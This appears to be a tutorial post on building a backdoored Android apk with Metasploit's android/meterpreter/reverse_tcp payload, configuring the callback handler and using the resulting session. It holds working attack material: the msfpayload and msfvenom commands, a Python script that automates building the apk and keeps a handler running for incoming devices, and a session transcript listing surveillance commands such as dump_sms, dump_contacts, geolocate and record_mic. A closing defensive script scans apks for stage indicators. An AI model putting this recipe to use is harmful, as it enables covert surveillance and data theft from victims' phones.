Metasploit - Android meterpreter

Create a malicious apk file

Create the malicious apk file (backdoor.apk). The trailing R tells msfpayload to write the payload in raw format; for the android/meterpreter payloads the raw output is already a complete apk, signed with a self-signed key (Android will not install an unsigned apk at all). The LHOST and LPORT given here are baked into the apk as the address it calls back to, so they must be reachable from the device. msfpayload has since been removed from Metasploit; the equivalent msfvenom command is msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 -o backdoor.apk.

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 R > backdoor.apk

Install the malicious apk file

For learning I used an Android x86 virtual machine rather than a real phone. Before the apk is installed on the device, set up the Android meterpreter listener: start msfconsole, select exploit/multi/handler (use exploit/multi/handler) and set the payload, LHOST and LPORT to the same values the apk was built with, otherwise the stage has nothing to call back to. Note in the process list further down that the stage runs as an ordinary app UID (com.metasploit.stage as u0_a80), so meterpreter has only the permissions the apk declares; check_root tells you whether an su binary is available on the device.

msf exploit(handler) > set payload android/meterpreter/reverse_tcp 
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (android/meterpreter/reverse_tcp):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   AutoLoadAndroid  true             yes       Automatically load the Android extension
   LHOST            192.168.1.108    yes       The listen address
   LPORT            4444             yes       The listen port
   RetryCount       10               yes       Number of trials to be made if connection failed


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.108:4444
[*] Starting the payload handler...
[*] Sending stage (44648 bytes) to 192.168.1.108
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.108:41175) at 2015-02-23 16:56:32 +0000
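The three steps above (build the apk, configure the handler, run it) as one script, added here as an example and not code from the original post or from the Metasploit project. It uses msfvenom, which replaced msfpayload, and writes the handler setup to a resource file so it can be replayed; the file name handler.rc, the function names, and the choice of ExitOnSession false with exploit -j (so the handler stays up for the apk's RetryCount reconnects or for a second device) are this example's own. It assumes msfvenom and msfconsole are on PATH when run for real; the functions themselves only build the command line and the resource script, so they can be checked without Metasploit installed.

```python
"""Build the Android meterpreter apk and start its handler in one go.

Added example, not from the original post or from Metasploit. Assumes
msfvenom and msfconsole are on PATH; handler.rc and the helper names are
this example's own choices.
"""
import ipaddress
import shlex
import subprocess
import sys
from pathlib import Path

PAYLOAD = "android/meterpreter/reverse_tcp"


def validate_endpoint(lhost: str, lport: int) -> None:
    """Reject obvious mistakes before anything is generated: the address is
    baked into the apk, so a typo here means a stage that never calls back."""
    ipaddress.ip_address(lhost)          # raises ValueError on non-IP input
    if not 1 <= lport <= 65535:
        raise ValueError(f"LPORT out of range: {lport}")


def msfvenom_argv(lhost: str, lport: int, out: str = "backdoor.apk") -> list:
    """msfvenom equivalent of the post's msfpayload ... R > backdoor.apk.
    For android/* payloads -o writes a complete, signed apk."""
    validate_endpoint(lhost, lport)
    return ["msfvenom", "-p", PAYLOAD, f"LHOST={lhost}", f"LPORT={lport}", "-o", out]


def handler_rc(lhost: str, lport: int) -> str:
    """msfconsole resource script reproducing the post's handler setup.
    ExitOnSession false plus exploit -j keeps the handler running as a job,
    so the apk's RetryCount reconnects (or a second device) still land."""
    validate_endpoint(lhost, lport)
    return "\n".join([
        "use exploit/multi/handler",
        f"set payload {PAYLOAD}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",
        "exploit -j -z",
        "",
    ])


def main(argv: list) -> int:
    if len(argv) != 3:
        print(f"usage: {argv[0]} LHOST LPORT", file=sys.stderr)
        return 2
    lhost, lport = argv[1], int(argv[2])
    cmd = msfvenom_argv(lhost, lport)
    print("+", shlex.join(cmd))
    subprocess.run(cmd, check=True)                 # writes backdoor.apk
    rc = Path("handler.rc")
    rc.write_text(handler_rc(lhost, lport))
    print(f"+ msfconsole -q -r {rc}")
    subprocess.run(["msfconsole", "-q", "-r", str(rc)], check=True)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as python3 script.py 192.168.1.108 4444: it generates backdoor.apk in the current directory, writes handler.rc, and leaves you in msfconsole with the handler running as a background job; sessions -i 1 attaches to the first device that calls back.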

meterpreter > help

Core Commands 
============= 

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Android Commands
================

    Command        Description
    -------        -----------
    check_root     Check if device is rooted
    dump_calllog   Get call log
    dump_contacts  Get contacts list
    dump_sms       Get sms messages
    geolocate      Get current lat-long using geolocation


meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.4.2 - Linux 3.10.52-android-x86+ (i686)
Meterpreter : java/android
meterpreter > ps

Process List  
============  

 PID   Name                                            Arch  User
 ---   ----                                            ----  ----
 1     /init                                                 root
 2     kthreadd                                              root
 3     ksoftirqd/0                                           root
 5     kworker/0:0H                                          root
 6     kworker/u2:0                                          root
 7     migration/0                                           root
 8     rcu_preempt                                           root
 9     rcu_bh                                                root
 10    rcu_sched                                             root
 11    watchdog/0                                            root
 12    khelper                                               root
 295   writeback                                             root
 298   bioset                                                root
 299   crypto                                                root
 301   kblockd                                               root
 346   ata_sff                                               root
 353   khubd                                                 root
 462   kworker/0:1                                           root
 483   kswapd0                                               root
 484   fsnotify_mark                                         root
 521   kworker/u2:2                                          root
 660   scsi_eh_0                                             root
 672   scsi_eh_1                                             root
 675   scsi_eh_2                                             root
 728   kworker/0:2                                           root
 747   cfinteractive                                         root
 756   binder                                                root
 782   deferwq                                               root
 810   kworker/0:1H                                          root
 890   kpsmoused                                             root
 906   /sbin/v86d                                            root
 924   /sbin/ueventd                                         root
 1010  /system/bin/powerbtnd                                 root
 1011  /system/bin/sdcard                                    media_rw
 1014  /sbin/healthd                                         root
 1015  /system/bin/servicemanager                            system
 1016  /system/bin/vold                                      root
 1017  /system/bin/netd                                      root
 1018  /system/bin/debuggerd                                 root
 1019  /system/bin/rild                                      radio
 1020  /system/bin/surfaceflinger                            root
 1021  zygote                                                root
 1022  /system/bin/drmserver                                 drm
 1023  /system/bin/mediaserver                               media
 1024  /system/bin/installd                                  install
 1025  /system/bin/keystore                                  keystore
 1026  /system/bin/sh                                        root
 1027  /system/bin/sh                                        root
 1040  /system/xbin/su                                       root
 1041  /sbin/adbd                                            shell
 1335  system_server                                         system
 1380  /system/bin/dhcpcd                                    dhcp
 1425  com.android.systemui                                  u0_a11
 1503  com.google.android.inputmethod.latin                  u0_a48
 1517  com.google.android.gms                                u0_a8
 1530  com.android.phone                                     radio
 1536  com.cyanogenmod.trebuchet                             u0_a19
 1662  com.google.process.gapps                              u0_a8
 1688  com.google.process.location                           u0_a8
 1929  com.google.android.partnersetup                       u0_a10
 2097  com.android.vending                                   u0_a15
 2129  com.thirdparty.superuser                              system
 2143  com.google.android.googlequicksearchbox:search        u0_a20
 2220  com.android.deskclock                                 u0_a34
 2311  android.process.acore                                 u0_a3
 2663  com.android.packageinstaller                          u0_a58
 2677  com.android.defcontainer                              u0_a4
 2696  com.android.musicfx                                   u0_a13
 2716  com.google.android.apps.docs                          u0_a37
 2736  com.android.gallery3d                                 u0_a42
 2757  com.svox.pico                                         u0_a60
 2825  android.process.media                                 u0_a6
 3361  com.android.settings                                  system
 3391  com.google.android.gms.drive                          u0_a8
 3414  com.google.android.gms.wearable                       u0_a8
 3441  com.android.keychain                                  system
 3457  com.android.documentsui                               u0_a36
 3473  com.android.externalstorage                           u0_a7
 3781  com.zmappsh                                           u0_a75
 3813  com.zmappsh:bdservice_v1                              u0_a75
 3930  jackpal.androidterm                                   u0_a23
 3944  /system/bin/sh                                        u0_a23
 4106  lysesoft.andftp                                       u0_a79
 4225  com.cyanogenmod.filemanager                           u0_a28
 4240  /system/bin/sh                                        u0_a28
 4250  /system/bin/sh                                        u0_a28
 4324  com.metasploit.stage                                  u0_a80
 4372  wget                                                  root
 4380  sh                                                    u0_a80
 4381  ps                                                    u0_a80

Notes

When I install the apk file on a phone that has Tencent security software installed, it shows me "App not installed".
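Why a security product flags the file: the apk that msfpayload/msfvenom produce is a generic, unobfuscated stage whose class names and callback address sit in classes.dex as plain strings, about the easiest signature there is. The triage script below is an added example, not code from the original post or from Metasploit. It unzips an apk, checks for a v1 (META-INF) signature, and scans every .dex for indicator strings and a callback address. Two assumptions: the package name com.metasploit.stage is taken from the process list above, but the exact class names inside a given Metasploit version's stage are not shown on this page; and the tcp://host:port form of the callback is assumed, not documented here. The sample apk the script builds for itself is constructed for the demonstration and is not a real stage.

```python
"""Static triage of an apk for the Metasploit Android stage.

Added example, not part of the original post. The indicator strings are
assumptions: the package name matches the com.metasploit.stage process in
the post's ps output; the tcp://host:port callback form is assumed.
"""
import io
import re
import sys
import zipfile

INDICATORS = (b"com/metasploit/stage", b"com.metasploit.stage", b"metasploit")
CALLBACK_RE = re.compile(rb"tcp://(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})")


def scan_dex(dex: bytes) -> dict:
    """Cheap string scan of a dex file: class-name indicators and any
    tcp://host:port callback. Returns sorted lists so results are stable."""
    hits = sorted({i.decode() for i in INDICATORS if i in dex})
    callbacks = sorted({(h.decode(), int(p)) for h, p in CALLBACK_RE.findall(dex)})
    return {"indicators": hits, "callbacks": callbacks}


def triage_apk(apk_bytes: bytes) -> dict:
    """An apk is a zip: list it, note the signature files, scan every .dex."""
    result = {"signed": False, "dex_files": [], "indicators": [], "callbacks": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        # Android refuses unsigned apks, so some signature is always present.
        # A v1 (JAR) signature shows up as META-INF/*.RSA|DSA|EC; v2/v3
        # signatures live in the APK Signing Block and are not checked here.
        result["signed"] = any(
            n.startswith("META-INF/") and n.upper().endswith((".RSA", ".DSA", ".EC"))
            for n in names
        )
        for n in names:
            if n.endswith(".dex"):
                result["dex_files"].append(n)
                r = scan_dex(z.read(n))
                result["indicators"] += r["indicators"]
                result["callbacks"] += r["callbacks"]
    result["indicators"] = sorted(set(result["indicators"]))
    result["callbacks"] = sorted(set(result["callbacks"]))
    result["verdict"] = "metasploit-stage" if result["indicators"] else "no-indicator"
    return result


def build_sample_apk() -> bytes:
    """Constructed stand-in for backdoor.apk: a zip with a fake classes.dex
    carrying the strings a real stage would, plus a fake v1 signature file."""
    dex = (b"dex\n035\0" + b"\0" * 32
           + b"Lcom/metasploit/stage/Payload;\0tcp://192.168.1.108:4444\0")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")  # binary XML header only
        z.writestr("classes.dex", dex)
        z.writestr("META-INF/CERT.RSA", b"not a real PKCS#7 block")
    return buf.getvalue()


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_apk()
    for key, value in triage_apk(data).items():
        print(f"{key}: {value}")
```

Run it with python3 triage.py backdoor.apk against the file msfpayload produced, or with no argument to see the constructed sample. The callback it prints is what the handler must be listening on, which is also the first thing a defender would block or sinkhole.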
